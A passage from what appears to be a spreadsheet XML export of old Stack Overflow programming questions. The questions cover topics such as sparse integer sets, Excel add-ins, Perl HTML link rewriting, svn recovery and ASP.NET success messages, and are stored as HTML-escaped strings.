    <t xml:space="preserve">&lt;p&gt;What is a good way to represent sparse set of integers (really C memory addresses) in a compact and fast way. I already know about the obvious things like bit-vectors and run-length encoding. but I want something much more compact than one word per set element. I need to add and remove elements and test for membership. I do not need other set operations, like union.&lt;/p&gt;
&lt;p&gt;I read about one such library many years ago but have since forgotten its name. I think it was released as open source by HP and had a womans name.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Excel 2002 Add-In not loading when the application opens</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Good afternoon,&lt;/p&gt;
&lt;p&gt;I created an Excel .xla addin for Excel 2002.  This weird behavior I am seeing from it happens only on my machine, but not on my coworkers.  I would like to understand why.&lt;/p&gt;
&lt;p&gt;The add-in has a UDF function that gets called from many, many spreadsheets.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;My Add-in is set to open when Excel opens.  When I open a blank spreadsheet it works fine.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;If I double-click on an .XLS that references the add-in, Excel fails to load the VBA project, and I get #NAME!.  However, if I open Excel and then the spreadsheet, it works fine.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I've checked the blacklist "disabled items" under the help menu.  There's nothing there.  This has been working for a long time now; I can't find out what changed.  I've tried nuking all Registry entries with my add-in's name and trying again.  Still doesn't work.&lt;/p&gt;
&lt;p&gt;Any ideas?  Thanks.
-Alan.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get selected text and selected nodes on a page?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When selecting a block of text (possibly spanning across many DOM nodes), is it possible to extract the selected text and nodes using Javascript?&lt;/p&gt;
&lt;p&gt;Imagine this HTML code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;h1&amp;gt;Hello World&amp;lt;/h1&amp;gt;&amp;lt;p&amp;gt;Hi &amp;lt;b&amp;gt;there!&amp;lt;/b&amp;gt;&amp;lt;/p&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If the user initiated a mouseDown event starting at "World..." and then a mouseUp even right after "there!", I'm hoping it would return:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Text : { selectedText: "WorldHi there!" },
Nodes: [ 
  { node: "h1", offset: 6, length: 5 }, 
  { node: "p", offset: 0, length: 16 }, 
  { node: "p &amp;gt; b", offset: 0, length: 6 } 
]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried putting the HTML into a textarea but that will only get me the selectedText. I haven't tried the &lt;code&gt;&amp;lt;canvas&amp;gt;&lt;/code&gt; element but that may be another option.&lt;/p&gt;
&lt;p&gt;If not JavaScript, is there a way this is possible using a Firefox extension? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>HowTo Multicast a Stream Captured with DirectShow?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a requirement to build a very simple streaming server. It needs to be able to capture video from a device and then stream that video via multicast to several clients on a LAN. &lt;/p&gt;
&lt;p&gt;The capture part of this is pretty easy (in C#) thanks to a library someone wrote with DirectShow.Net (&lt;a href="http://www.codeproject.com/KB/directx/directxcapture.aspx" rel="nofollow"&gt;http://www.codeproject.com/KB/directx/directxcapture.aspx&lt;/a&gt;). &lt;/p&gt;
&lt;p&gt;The question I have now is how to multicast this? This is the part I'm stuck on. I'm not sure what to do next, or what steps to take. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>SSE4 instructions in VS2005?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to use the popcnt instruction in a project that is compiled using Visual Stdio 2005&lt;br /&gt;
The intrinsic &lt;code&gt;__popcnt()&lt;/code&gt; only works with VS2008 and the compiler doesn't seem to recognize the instruction even when I write in a &lt;code&gt;__asm {}&lt;/code&gt; block.&lt;/p&gt;
&lt;p&gt;Is there any way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Increase number of characters in filename field of GetOpenFileName file selection dialog</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our app allows multiple files to be selected in a file selection dialog which is shown via the GetOpenFileName function (this question also applies to folks using CFileDialog, etc...)&lt;/p&gt;
&lt;p&gt;There appears to be a limit to the number of characters that can be typed into the filename field (259 seems to be the magic number - not sure why).&lt;/p&gt;
&lt;p&gt;We have tried changing the following members of the &lt;a href="http://msdn.microsoft.com/en-us/library/ms646839(VS.85).aspx" rel="nofollow"&gt;OPENFILENAME&lt;/a&gt; structure:&lt;/p&gt;
&lt;p&gt;lpstrFile - point to our own buffer, sized at 4K bytes
nMaxFile - set to the size of lpstrFile (we are compiling ANSI, so this is effectively 4000&lt;/p&gt;
&lt;p&gt;But these values appear to not increase the input width of the filename field in the dialog.&lt;/p&gt;
&lt;p&gt;I am going to experiment with sending a EM_SETLIMITTEXT message to the control, but wanted to know if anyone else has a solution.&lt;/p&gt;
&lt;p&gt;EDIT - solved this myself: &lt;a href="http://stackoverflow.com/questions/361350/increase-number-of-characters-in-filename-field-of-getopenfilename-file-selecti#394443"&gt;solution&lt;/a&gt;  I can't accept out my own answer, but here it is for posterity. If anyone else has a better solution, please post it - or feel free to mod up my solution so future searchers will find it at the top.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I hide a directory/path from Launch Services?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to be able to build test applications (e.g. the nightly Minefield/Firefox) without Launch Services deciding that they're the best way to open their assigned file types.&lt;/p&gt;
&lt;p&gt;Is there a way to hide my ~/src directory from Launch Services, so that Finder won't register applications in that folder?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Silverlight 2 Error Code: 4004</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hey guys/gals. I have a silverlight 2 app that has an ObservableCollection of a class from a separate assem/lib. When I set my ListBox.ItemsSource on that collection, and run it, I get the error code: 4004 "System.ArgumentException: Value does not fall within the expected range."
Here is part of the code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public partial class Page : UserControl
{
    ObservableCollection&amp;lt;Some.Lib.Owner&amp;gt; ooc;
    public Page()
    {
        ooc = new ObservableCollection&amp;lt;Some.Lib.Owner&amp;gt;();
        Some.Lib.Owner o1 = new Some.Lib.Owner() { FirstName = "test1" };
        Some.Lib.Owner o2 = new Some.Lib.Owner() { FirstName = "test2" };
        Some.Lib.Owner o3 = new Some.Lib.Owner() { FirstName = "test3" };
        ooc.Add(o1);
        ooc.Add(o2);
        ooc.Add(o3);
        InitializeComponent();
        lb1.ItemsSource = ooc;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But when I create the Owner class within this same project, everything works fine.
Is there some security things going on behind the scenes? Also, I'm using the generate a html page option and not the aspx option, when I created this Silverlight 2 app.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>initializing std::string from char* without copy</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a situation where I need to process large (many GB's) amounts of data as such:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;build a large string by appending many smaller (C char*) strings&lt;/li&gt;
&lt;li&gt;trim the string&lt;/li&gt;
&lt;li&gt;convert the string into a C++ const std::string for processing (read only)&lt;/li&gt;
&lt;li&gt;repeat&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The data in each iteration are independent.&lt;/p&gt;
&lt;p&gt;My question is, I'd like to minimise (if possible eliminate) heap allocated memory usage, as it at the moment is my largest performance problem.&lt;/p&gt;
&lt;p&gt;Is there a way to convert a C string (char*) into a stl C++ string (std::string) without requiring std::string to internally alloc/copy the data?&lt;/p&gt;
&lt;p&gt;Alternatively, could I use stringstreams or something similar to re-use a large buffer?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; Thanks for the answers, for clarity, I think a revised question would be:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;How can I build (via multiple appends) a stl C++ string efficiently. And if performing this action in a loop, where each loop is totally independant, how can I re-use thisallocated space.&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reading an XML File using FileInputStream (for Java)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;here's the deal.&lt;/p&gt;
&lt;p&gt;For my project I have to serialize and deserialize a random tree using Java and XStream.  My teacher made the Tree/RandomTree algorithms, so I don't have to worry about that.  What I don't know how to do is this:  I am using FileInputStream to read/write the xml file that I serialized and deserialized, but when I deserialize, I do not know the method used to read the file.  After I read the file I should be able to convert it from XML and then print it out as a string.  Here's what I have so far.  (I imported everything correctly, just didn't add it to my code segment).  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;FileInputStream fin;    	
try
{
    // Open an input stream
    fin = new FileInputStream ("/Users/Pat/programs/randomtree.xml");
    //I don't know what to put below this, to read FileInpuStream object fin
    String dexml = (String)xstream.fromXML(fin);
	System.out.println(dexml);
    // Close our input stream
    fin.close();	
	System.out.println(dexml);
    // Close our input stream
    fin.close();		
}
// Catches any error conditions
catch (IOException e)
{
	System.err.println ("Unable to read from file");
	System.exit(-1);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;  Hey guys, thanks for the help, I figured it out; I don't think I have to print it as a string, I just needed to make a benchmarking framework to time it and such, but thanks again!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC vs WebForms for First Page Load Speed for Big Projects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a pretty big ASP.NET WebForm (web application) project with a lot of references to other libraries, other projects etc and most of the time after a compilation, the first time we load a page it takes a LONG time before rendering anything...  Disk IO is the main problem.  For small projects it's nearly instantaneous, but once your project gets large, it can really slow development and remove fun from programming.&lt;/p&gt;
&lt;p&gt;My question:
Is first page load time after a compilation as long in ASP.NET MVC as it is in ASP.NET Webforms for big projects?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VS2008 binary 3x times slower than VS2005?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've just upgraded a native C++ project from VS2005-SP1 to VS2008-SP1&lt;br /&gt;
The first thing I tested was a very basic functionality test of the application and the first thing I noticed is that the main number-crunching algorithm performs three times slower in the VS2008 binary.&lt;br /&gt;
I tested again the VS2005 binary to make sure there isn't any other difference and it still performed as it did before.&lt;br /&gt;
Did anyone stumble into this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get last MySQL binary log entry</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using MySQL replication, and I'd like a status script running on the slave to report the last statement that was replicated over to the slave.&lt;/p&gt;
&lt;p&gt;I can use "SHOW SLAVE STATUS" to get the current read and execute positions.  But how do I use that information with mysqlbinlog to read the last entry?  Assuming the slave is caught up with the master, the following statement returns nothing useful:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;mysqlbinlog.exe -R --start-position=&amp;lt;READ_MASTER_LOG_POS&amp;gt; &amp;lt;MASTER_LOG_FILE&amp;gt; -h &amp;lt;MASTER_HOST&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can't seem to minus one from the log position to get the previous statement, and I don't see any way to give a negative offset meaning to read from the end in reverse order.  Is there any way to do this?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Drupal 6 : CCK : Views2 : What ways would you substitute an image for a view-field</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Background:&lt;/strong&gt; Customer X has a CCK-based Content Type (vendorxxentry) and is using Views2 to generate a listing of all the vendorxxentry nodes in a simple table. &lt;/p&gt;
&lt;p&gt;One of the fields in vendorxxentry is called "vendorxxattitude", which appears as one of the following enumerated possible values:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;happy&lt;/li&gt;
&lt;li&gt;sleepy&lt;/li&gt;
&lt;li&gt;dopey&lt;/li&gt;
&lt;li&gt;grumpy&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Customer X has four custom-made 16x16 images that correspond to these enumerated values. He wants to have them display in the generated view, so instead of seeing "happy" in the generated view, the user would see the image happy.png in its place. Customer X would like to accomplish this without breaking the ability to sort individual columns as can be currently done with Views2 in table output mode.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Question:&lt;/strong&gt; What methods would you use in order to substitute the text with the associated images? Assume that the images should only be substituted in one or more specific views (e.g., vendorxxsummary, vendorxxbyxxdate, vendorxxbyxxindustry), but not in the individual node views themselves.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Recovering from an unfortunate "svn copy"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This afternoon, upon noticing a broken build and the fact that some files looked like very old versions (about 2 weeks old), I checked the svn log.  Apparently just this afternoon, 1 of the developers did an "svn copy" of a directory from an older revision to the same directory.  Thus it appears that the latest version "i.e. head" of all the files in that directory are really old, and all the history "i.e. log" is even older.&lt;/p&gt;
&lt;p&gt;However, I think I can recover by using another "svn copy" (i.e. the disease is the cure).  What I am considering doing is finding the revision where the bad "svn copy" was done (say rev 1234) , subtracting 1 (1233) and doing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;svn copy -r 1233 file://path/to/messed/up/dir file://path/to/messed/up/dir
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That &lt;em&gt;should&lt;/em&gt; restore the latest version, as well as get back all my history.  Am I right about this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is a keyframed transition possible in Core Animation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know that keyframed transitions are possible in Core Animation via setting the &lt;code&gt;path&lt;/code&gt; property on the &lt;code&gt;CAAnimation&lt;/code&gt; instance. However, &lt;code&gt;CATransition&lt;/code&gt; does not seem to have this functionality. Does anyone know any other ways to control the transition apart from setting the timing function?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there any native way in ASP.NET to do a "success message"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say you have something like an ASP.NET ASP:DetailsView to show and edit a single record in a database.&lt;/p&gt;
&lt;p&gt;It's simple to record the error cases... you add validation and a validation summary.  When your update form fails validation it naturally makes noise: it shows the validation message and/or the validation summary.  Not a single code behind is required.&lt;/p&gt;
&lt;p&gt;But then, you pass validation, and it makes your update completely silently.  There's no sense that anything happened, and there doesn't seem to be any default settings to make a success message without code-behinds.&lt;/p&gt;
&lt;p&gt;But, even code-behinds are confusing.  What event should show the success message?  onItemUpdate, right?  Fine, but then let's say you make another change and get a validation error?  Your success message stays.  I wasn't able to find an event that would reliably turn off an existing success message if there were a validation error.  &lt;/p&gt;
&lt;p&gt;This should be web development 101!  Why is it so hard?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Someone suggested using the ItemCommand event... I tried this and many other events, but that success message just won't disappear.  Here's some code.&lt;/p&gt;
&lt;p&gt;My message in ASP.NET&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;label id="successMessage" class="successMessage" runat="server"&amp;gt;&amp;lt;/label&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And my DataView tag (simplified):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    &amp;lt;asp:DetailsView 
        Id="EditClient"
        DataKeyNames="LicenseID" 
    DataSourceID="MySource"
    runat="server" 
        OnItemUpdated="SuccessfulClientUpdate"
        OnItemCommand="ClearMessages"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And, my code-behind:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected void SuccessfulClientUpdate(object sender, DetailsViewUpdatedEventArgs e)
{
    successMessage.InnerText = string.Format("Your changes were saved.");
    successMessage.Visible = true;
}
protected void ClearMessages(object sender, DetailsViewCommandEventArgs e)
{
    successMessage.InnerText = string.Empty;
    successMessage.Visible = false;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Once I do a successful update, however, nothing seems to make that message disappear, not even failed validation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2nd EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Just want to be clear that I did try putting the ClearMessages code in Page_Load.  However, nothing seems to make that successMessage label disappear when I hit update a 2nd time WITH a validation error.  Can anyone suggest any other troubleshooting tips?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do sites like Hubspot track inbound links?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are all these types of sites just illegally scraping Google or another search engine?&lt;br /&gt;
As far as I can tell ther is no 'legal' way to get this data for a commercial site.. The Yahoo! api ( &lt;a href="http://developer.yahoo.com/search/siteexplorer/V1/inlinkData.html" rel="nofollow"&gt;http://developer.yahoo.com/search/siteexplorer/V1/inlinkData.html&lt;/a&gt; ) is only for noncommercial use, Yahoo! Boss does not allow automated queries etc.&lt;br /&gt;
Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I extract or change links in HTML with Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this input text:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&amp;lt;meta http-equiv="content-type" content="text/html; charset=utf-8"&amp;gt;&amp;lt;/head&amp;gt;&amp;lt;body&amp;gt;&amp;lt;table cellspacing="0" cellpadding="0" border="0" align="center" width="603"&amp;gt;   &amp;lt;tbody&amp;gt;&amp;lt;tr&amp;gt;     &amp;lt;td&amp;gt;&amp;lt;table cellspacing="0" cellpadding="0" border="0" width="603"&amp;gt;       &amp;lt;tbody&amp;gt;&amp;lt;tr&amp;gt;         &amp;lt;td width="314"&amp;gt;&amp;lt;img height="61" width="330" src="/Elearning_Platform/dp_templates/dp-template-images/awards-title.jpg" alt="" /&amp;gt;&amp;lt;/td&amp;gt;         &amp;lt;td width="273"&amp;gt;&amp;lt;img height="61" width="273" src="/Elearning_Platform/dp_templates/dp-template-images/awards.jpg" alt="" /&amp;gt;&amp;lt;/td&amp;gt;       &amp;lt;/tr&amp;gt;     &amp;lt;/tbody&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/td&amp;gt;   &amp;lt;/tr&amp;gt;   &amp;lt;tr&amp;gt;     &amp;lt;td&amp;gt;&amp;lt;table cellspacing="0" cellpadding="0" border="0" align="center" width="603"&amp;gt;       &amp;lt;tbody&amp;gt;&amp;lt;tr&amp;gt;         &amp;lt;td colspan="3"&amp;gt;&amp;lt;img height="45" width="603" src="/Elearning_Platform/dp_templates/dp-template-images/top-bar.gif" alt="" /&amp;gt;&amp;lt;/td&amp;gt;       &amp;lt;/tr&amp;gt;       &amp;lt;tr&amp;gt;         &amp;lt;td background="/Elearning_Platform/dp_templates/dp-template-images/left-bar-bg.gif" width="12"&amp;gt;&amp;lt;img height="1" width="12" src="/Elearning_Platform/dp_templates/dp-template-images/left-bar-bg.gif" alt="" /&amp;gt;&amp;lt;/td&amp;gt;         &amp;lt;td width="580"&amp;gt;&amp;lt;p&amp;gt;&amp;amp;nbsp;what y all heard?&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;i'm shark oysters.&amp;lt;/p&amp;gt;             &amp;lt;p&amp;gt;&amp;amp;nbsp;&amp;lt;/p&amp;gt;             &amp;lt;p&amp;gt;&amp;amp;nbsp;&amp;lt;/p&amp;gt;             &amp;lt;p&amp;gt;&amp;amp;nbsp;&amp;lt;/p&amp;gt;             &amp;lt;p&amp;gt;&amp;amp;nbsp;&amp;lt;/p&amp;gt;             &amp;lt;p&amp;gt;&amp;amp;nbsp;&amp;lt;/p&amp;gt;             &amp;lt;p&amp;gt;&amp;amp;nbsp;&amp;lt;/p&amp;gt;&amp;lt;/td&amp;gt;         &amp;lt;td background="/Elearning_Platform/dp_templates/dp-template-images/right-bar-bg.gif" width="11"&amp;gt;&amp;lt;img height="1" width="11" src="/Elearning_Platform/dp_templates/dp-template-images/right-bar-bg.gif" alt="" /&amp;gt;&amp;lt;/td&amp;gt;       &amp;lt;/tr&amp;gt;       &amp;lt;tr&amp;gt;         &amp;lt;td colspan="3"&amp;gt;&amp;lt;img height="31" width="603" src="/Elearning_Platform/dp_templates/dp-template-images/bottom-bar.gif" alt="" /&amp;gt;&amp;lt;/td&amp;gt;       &amp;lt;/tr&amp;gt;     &amp;lt;/tbody&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/td&amp;gt;   &amp;lt;/tr&amp;gt; &amp;lt;/tbody&amp;gt;&amp;lt;/table&amp;gt; &amp;lt;p&amp;gt;&amp;amp;nbsp;&amp;lt;/p&amp;gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see, there's no newline in this chunk of HTML text, and I need to look for all image links inside, copy them out to a directory, and change the line inside the text to something like &lt;code&gt;./images/file_name&lt;/code&gt;. &lt;/p&gt;
&lt;p&gt;Currently, the Perl code that I'm using looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;my ($old_src,$new_src,$folder_name);
    foreach my $record (@readfile) {
    	## so the if else case for the url replacement block below will be correct
    	$old_src = "";
    	$new_src = "";
        if ($record =~ /\&amp;lt;img(.+)/){
    		if($1=~/src=\"((\w|_|\\|-|\/|\.|:)+)\"/){
    			$old_src = $1;
            	my @tmp = split(/\/Elearning/,$old_src);
    			$new_src = "/media/www/vprimary/Elearning".$tmp[-1];
    			push (@images, $new_src);
    			$folder_name = "images";
    		}## end if
    	}
    	elsif($record =~ /background=\"(.+\.jpg)/){
    		$old_src = $1;
    		my @tmp = split(/\/Elearning/,$old_src);
    		$new_src = "/media/www/vprimary/Elearning".$tmp[-1];
    		push (@images, $new_src);
    		$folder_name = "images";
    	}
    	elsif($record=~/\&amp;lt;iframe(.+)/){
    		if($1=~/src=\"((\w|_|\\|\?|=|-|\/|\.|:)+)\"/){
                $old_src = $1;
                my @tmp = split(/\/Elearning/,$old_src);
                $new_src = "/media/www/vprimary/Elearning".$tmp[-1];
    			## remove the ?rand behind the html file name
    			if($new_src=~/\?rand/){
    				my ($fname,$rand) = split(/\?/,$new_src);
    				$new_src = $fname;
    				my ($fname,$rand) = split(/\?/,$old_src);
    				$old_src = $fname."\\?".$rand;
    			}
    	print "old_src::$old_src\n"; ##s7test
    	print "new_src::$new_src\n\n"; ##s7test
                push (@iframes, $new_src);
    			$folder_name = "iframes";
            }## end if
    	}## end if
    	my $new_record = $record;
    	if($old_src &amp;amp;&amp;amp; $new_src){
    		$new_record =~ s/$old_src/$new_src/ ;
    print "new_record:$new_record\n"; ##s7test
    		my @tmp = split(/\//,$new_src);
    		$new_record =~ s/$new_src/\.\\$folder_name\\$tmp[-1]/;
##  print "new_record2:$new_record\n\n"; ##s7test
    	}## end if
    	print WRITEFILE $new_record;
    } # foreach
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is only sufficient to handle HTML text with newlines in them.
I thought only looping the regex statement, 
but then i would have to change the matching line to some other text.&lt;/p&gt;
&lt;p&gt;Do you have any idea if there an elegant Perl way to do this? 
Or maybe I'm just too dumb to see the obvious way of doing it, plus I know putting global option doesn't work.&lt;/p&gt;
&lt;p&gt;thanks.
~steve&lt;/p&gt;
</t>
  </si>
  <si>
    <t>FontFamily question</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Why the FontFamily param of the Font object is a string and not an enum?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Literature and tutorials for writing a ray tracer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am interested in finding recommendations on books on writing a raytracer, simple and clear implementations of ray tracing that can be seen on the web, and online resources on introductory ray tracing.&lt;/p&gt;
&lt;p&gt;Ideally, the approach would be incremental and tutorial in style, and explain both the programming techniques and underyling mathematics, starting from the basics.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to read list of string</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this:&lt;/p&gt;
&lt;p&gt;Public stringList As New List(Of String)&lt;/p&gt;
&lt;p&gt;I need to read the whole list using For each statement, what is the best way to do so using VB.net syntax?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Thread safety and `const`</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How does &lt;code&gt;const&lt;/code&gt; (pointers, references and member functions) help with thread safety in C++?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to abstract out 2 different implementations of cache</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I plan to use a distributed cache in my load-balanced webapp.
So I'm going to try to abstract out the common functions between apache ehcache and memcached.&lt;/p&gt;
&lt;p&gt;My goal is to be able to make a simple configuration switch to select the caching solution to use. Should I go the SPI route e.g. like how XML parsers are wired in ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>UITextField input issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my application there have two Outlet, one is UItextfield and another is UIWebview, textfield used to get the url request by the user and shown it in webview, but I met a problem is when finish the typing in my textfield, and click GO button(return) in the keyboard, that is nothing happen in my webview, my source code as shown in below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- (BOOL)textFieldShouldReturn:(UITextField *)textField
{
    NSLog(@"clicked");
    [textField resignFirstResponder];
    [mywebview loadRequest:[NSURLRequest requestWithURL:[NSURL URLWithString:[textField text]]]];
    return YES;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is the problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Image resize in Grails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing a Web Album using Grails and for image processing, I am using grails-image-tools plugin. I need a functionality to resize the images if the uploaded images size is too big (for eg: more than 600 * 840 ) . In this case I need to resize this image to 600 * 840). What is the most efficient way to do this? Thanks a lot.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best practice for persistence right now?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I come from a java background.&lt;/p&gt;
&lt;p&gt;But I would like a cross-platform perspective on what is considered best practice for persisting objects.&lt;/p&gt;
&lt;p&gt;The way I see it, there are 3 camps:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ORM camp&lt;/li&gt;
&lt;li&gt;direct query camp e.g. JDBC/DAO, iBatis&lt;/li&gt;
&lt;li&gt;LINQ camp&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Do people still handcode queries (bypassing ORM) ? Why, considering the options available via JPA, Django, Rails.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Updating from Java 1.4.2 to Java 6 (both Sun VMs) results in slower performance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've just upgraded some old Java source which has been running on a Sun Java 1.4.2 VM to Sun Java (JRE) 6 VM. More or less the only thing I had to change was to add explicit datatypes for some abstract objects (Hashmap's, Vector's and so on). The code itself it quite memory intensive, using up to 1G of heap memory (using -Xmx1024m as a parameter to start the VM).&lt;/p&gt;
&lt;p&gt;Since I read alot about better performance on newer Java VM's, this was one of the reasons I did this upgrade.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Can anyone think of a reason why the performance is worse in my case now (just in general, of course, since you can't take a look at the code)?&lt;/li&gt;
&lt;li&gt;Has anyone some advice for a non Java guru what to look for if I wanted to optimize (speed wise) existing code? Any hints, recommended docs, tools?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I detect the DLLs required by an application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a nutshell: I want to do the same thing "Dependency Walker" does.&lt;/p&gt;
&lt;p&gt;Is there any Win32 API function which can enumerate the dependencies of a EXE and/or DLL file?&lt;/p&gt;
&lt;p&gt;And is there any safe way to detect dependencies on ActiveX classes? (I doubt it is possible, but who knows ...)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; I'm aware of available tools which provide the same core functionality (Dependency Walker, ProcessExplorer, AQTime, ...) but I want to create my own program which dumps a text file containing the required modules. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Carbide / Symbian C++ - Change Application Icon</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Carbide (just upgraded to 2.0) to develop an S60 3rd Edition application.&lt;/p&gt;
&lt;p&gt;I would like to know the easiest way to change the icon (both the application icon on the device menu &lt;strong&gt;and&lt;/strong&gt; the icon at the top left of the main view) because I have the need to skin my application in many different ways as easily as possible.&lt;/p&gt;
&lt;p&gt;All my efforts with messing around with .mif files have so far failed. I have a 44x44 .svg icon I made with Illustrator, could someone please help me in the right direction?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get an ListView item from the (X,Y) position?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am dropping something in a ListView in WPF. I need to know the item in the (X,Y) position I am dropping. How can I do this?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;The WPF ListView doesn't have GetItemAt. I return to my original problem.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are iframes considered 'bad practice'?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Somewhere along the line I picked up the notion that using iframes is 'bad practice'. &lt;/p&gt;
&lt;p&gt;Is this true? What are the pros/cons of using them?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java memory model - can someone explain it?</t>
  </si>
  <si>
